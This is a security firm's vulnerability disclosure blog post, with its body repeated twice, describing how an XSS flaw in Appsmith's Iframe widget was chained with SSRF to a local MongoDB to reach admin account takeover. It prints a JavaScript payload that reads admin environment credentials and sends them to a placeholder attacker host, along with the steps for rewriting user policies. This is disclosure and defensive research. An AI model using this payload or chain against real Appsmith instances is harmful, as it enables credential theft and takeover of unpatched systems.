🚀 CloudSEK has raised $19M Series B1 Round – Powering the Future of Predictive Cybersecurity
Read More
A vulnerable web applications can open the door to your critical assets. Stay protected with CloudSEK BeVigil Enterprise Web App Scanner module.
Schedule a Demo Authors : Sparsh Kulshrestha and Shashank Bharthwal
Editor : Deepanjli Paulraj
THREAT | IMPACT | MITIGATION |
---|---|---|
|
|
|
While navigating the different widgets available in Appsmith, we encountered an widget called Iframe. Using this widget users can insert iframes with arbitrary URLs and srcDoc in their Appsmith dashboards. We observed that the field named srcDoc is vulnerable to XSS.
The XSS could have been used to steal admin session cookies but the session cookies were marked as HttpOnly and hence are not accessible via Javascript.
Even though we couldn’t gain access to the cookies, we were able to use an iframe to fetch sensitive content from an API endpoint that only administrators have access to. One such endpoint was “/api/v1/admin/env” which contains the environment variables of Appsmith, including infrastructure-related credentials. Any other user apart from the administrator can not access the endpoint.
Since we have the capability to inject an iframe and execute arbitrary javascript, the admin can be tricked into loading the iframe successfully allowing javascript access to the contents of the iframe.
As a proof of concept the following code was injected in the srcDoc field, to insert an iframe that loads the admin environment endpoint and fetches the content of the iframe as soon as it finishes loading. Once the data is exfiltrated, it is sent to the attacker’s VPS where it can be decoded.
<html> <head> <script> function fetchContent() { var content = document.getElementById(“adminData”).contentDocument.body.getElementsByTagName(“pre”).innerHTML; b64encodedContent = btoa(content); document.location = “http://<attackers_ip:port>/exfiltrate?data=”+b64encodedContent; } </script> </head> <body> <p>Exploit</p> <iframe id=”adminData” src=”/api/v1/admin/env” onload=”fetchContent();”> </iframe> </body> </html> |
---|
Exploit Code for iframe injection and data exfiltration
Once the exploit is ready, it needs to be published so that other users can access it. This can be done by making the Appsmith dashboard public, and can be accessed by anyone.
Once the dashboard is published and is available to the public via a link, the link is sent to the administrator. As soon as the administrator clicks the link and views the dashboard, the iframe of the sensitive endpoint is loaded. Then the javascript steals the content of the iframe and sends it to the attacker. Here is how data is received on the attacker’s end when the administrator visits the malicious dashboard.
Now, this base64 encoded data can be decoded by the attacker by running the following command:
$ echo “<base64_encoded_data>” | base64 –decode
The decoded MongoDB credentials can be used for further investigation and exploitation.
From our previous testing on Appsmith, we know that there are protections that restrict access to the cloud instances’ internal metadata but there are no restrictions on the localhost. In addition, Appsmith has a feature which allows users to connect MongoDB as a data source.
We then checked if this functionality can be used to connect to the internal MongoDB running on localhost. This was done by filling the connection and authentication details obtained previously into the form which allows users to connect to MongoDB as a data source.
On clicking on the “Save” option, the data source was added successfully. After which, we were able to view all the collections in the Appsmith database, on the UI.
For each of these collections, it was possible to run the following DB queries
Out of all the collections, the one named “Users” contains the details of all users on the platform.
At this stage there are several ways to escalate privileges to an administrator. It is even possible to modify the admin user password hash or add admin policies to our user. We proceeded by fetching the admin policies from MongoDB, using the FIND command.
We found that the administrator account has the following policies associated with it.
“policies”: , “permission”: “manage:userWorkspace”, “users”: }, { “groups”: [], “permission”: “read:userWorkspace”, “users”: }, { “groups”: [], “permission”: “read:users”, “users”: }, { “groups”: [], “permission”: “manage:users”, “users”: }, { “groups”: [], “permission”: “manage:instanceEnv”, “users”: } ] |
---|
Then, using the update command, we updated the policies assigned to our user with the admin policies. On clicking on “RUN” we got a successful response from MongoDB.
To validate the vulnerability, we logged in to our user account via a different browser and found that it had access to all admin functionalities and permissions to manage users, workspaces, and instances.
We tried accessing the endpoint i.e. “/api/v1/admin/env”, which only administrators, and got a successful response from the server.
Attackers can first exploit the XSS vulnerability to steal internal MongoDB credentials, then an SSRF vulnerability can be exploited to connect to internal MongoDB to execute DB queries and achieve full account takeover or privilege escalation.
Also, Appsmith does not have a signup restriction in the default installation. So if an Appsmith instance is exposed to the internet, anyone can signup and have access to the vulnerable functionality in which the SSRF vulnerability was discovered.
This can have large-scale impact, given that over a 1000 Appsmith instances are exposed on the internet:
CloudSEK submitted this vulnerability to Appsmith via their well-defined vulnerability disclosure process. Subsequently, the Appsmith team fixed this issue in their next release. Appsmith versions 1.7.12 and above do not have this vulnerability.
Threat actors have been abusing advertisement services to serve malware to users and redirect traffic to websites purchasing services from them.
CVE 2023-20887 was discovered in the VMware Aria Operations with a CVSS score of 9.8 which leads to VMware Aria.
On 29th March, 2023 there were reports of malicious activity originating from a signed 3CX desktop application. CrowdStrike’s Falcon Overwatch has claimed to have observed malicious activities from both Windows and macOS binaries.
Take action now
CloudSEK Platform is a no-code platform that powers our products with predictive threat analytic capabilities.
Digital Risk Protection platform which gives Initial Attack Vector Protection for employees and customers.
Software and Supply chain Monitoring providing Initial Attack Vector Protection for Software Supply Chain risks.
Creates a blueprint of an organization's external attack surface including the core infrastructure and the software components.
Instant Security Score for any Android Mobile App on your phone. Search for any app to get an instant risk score.
min read
Appsmith Vulnerabilities Can be Chained to Achieve 1-Click Admin Account Takeover
Authors : Sparsh Kulshrestha and Shashank Bharthwal
Editor : Deepanjli Paulraj
THREAT | IMPACT | MITIGATION |
---|---|---|
|
|
|
While navigating the different widgets available in Appsmith, we encountered an widget called Iframe. Using this widget users can insert iframes with arbitrary URLs and srcDoc in their Appsmith dashboards. We observed that the field named srcDoc is vulnerable to XSS.
The XSS could have been used to steal admin session cookies but the session cookies were marked as HttpOnly and hence are not accessible via Javascript.
Even though we couldn’t gain access to the cookies, we were able to use an iframe to fetch sensitive content from an API endpoint that only administrators have access to. One such endpoint was “/api/v1/admin/env” which contains the environment variables of Appsmith, including infrastructure-related credentials. Any other user apart from the administrator can not access the endpoint.
Since we have the capability to inject an iframe and execute arbitrary javascript, the admin can be tricked into loading the iframe successfully allowing javascript access to the contents of the iframe.
As a proof of concept the following code was injected in the srcDoc field, to insert an iframe that loads the admin environment endpoint and fetches the content of the iframe as soon as it finishes loading. Once the data is exfiltrated, it is sent to the attacker’s VPS where it can be decoded.
<html> <head> <script> function fetchContent() { var content = document.getElementById(“adminData”).contentDocument.body.getElementsByTagName(“pre”).innerHTML; b64encodedContent = btoa(content); document.location = “http://<attackers_ip:port>/exfiltrate?data=”+b64encodedContent; } </script> </head> <body> <p>Exploit</p> <iframe id=”adminData” src=”/api/v1/admin/env” onload=”fetchContent();”> </iframe> </body> </html> |
---|
Exploit Code for iframe injection and data exfiltration
Once the exploit is ready, it needs to be published so that other users can access it. This can be done by making the Appsmith dashboard public, and can be accessed by anyone.
Once the dashboard is published and is available to the public via a link, the link is sent to the administrator. As soon as the administrator clicks the link and views the dashboard, the iframe of the sensitive endpoint is loaded. Then the javascript steals the content of the iframe and sends it to the attacker. Here is how data is received on the attacker’s end when the administrator visits the malicious dashboard.
Now, this base64 encoded data can be decoded by the attacker by running the following command:
$ echo “<base64_encoded_data>” | base64 –decode
The decoded MongoDB credentials can be used for further investigation and exploitation.
From our previous testing on Appsmith, we know that there are protections that restrict access to the cloud instances’ internal metadata but there are no restrictions on the localhost. In addition, Appsmith has a feature which allows users to connect MongoDB as a data source.
We then checked if this functionality can be used to connect to the internal MongoDB running on localhost. This was done by filling the connection and authentication details obtained previously into the form which allows users to connect to MongoDB as a data source.
On clicking on the “Save” option, the data source was added successfully. After which, we were able to view all the collections in the Appsmith database, on the UI.
For each of these collections, it was possible to run the following DB queries
Out of all the collections, the one named “Users” contains the details of all users on the platform.
At this stage there are several ways to escalate privileges to an administrator. It is even possible to modify the admin user password hash or add admin policies to our user. We proceeded by fetching the admin policies from MongoDB, using the FIND command.
We found that the administrator account has the following policies associated with it.
“policies”: , “permission”: “manage:userWorkspace”, “users”: }, { “groups”: [], “permission”: “read:userWorkspace”, “users”: }, { “groups”: [], “permission”: “read:users”, “users”: }, { “groups”: [], “permission”: “manage:users”, “users”: }, { “groups”: [], “permission”: “manage:instanceEnv”, “users”: } ] |
---|
Then, using the update command, we updated the policies assigned to our user with the admin policies. On clicking on “RUN” we got a successful response from MongoDB.
To validate the vulnerability, we logged in to our user account via a different browser and found that it had access to all admin functionalities and permissions to manage users, workspaces, and instances.
We tried accessing the endpoint i.e. “/api/v1/admin/env”, which only administrators, and got a successful response from the server.
Attackers can first exploit the XSS vulnerability to steal internal MongoDB credentials, then an SSRF vulnerability can be exploited to connect to internal MongoDB to execute DB queries and achieve full account takeover or privilege escalation.
Also, Appsmith does not have a signup restriction in the default installation. So if an Appsmith instance is exposed to the internet, anyone can signup and have access to the vulnerable functionality in which the SSRF vulnerability was discovered.
This can have large-scale impact, given that over a 1000 Appsmith instances are exposed on the internet:
CloudSEK submitted this vulnerability to Appsmith via their well-defined vulnerability disclosure process. Subsequently, the Appsmith team fixed this issue in their next release. Appsmith versions 1.7.12 and above do not have this vulnerability.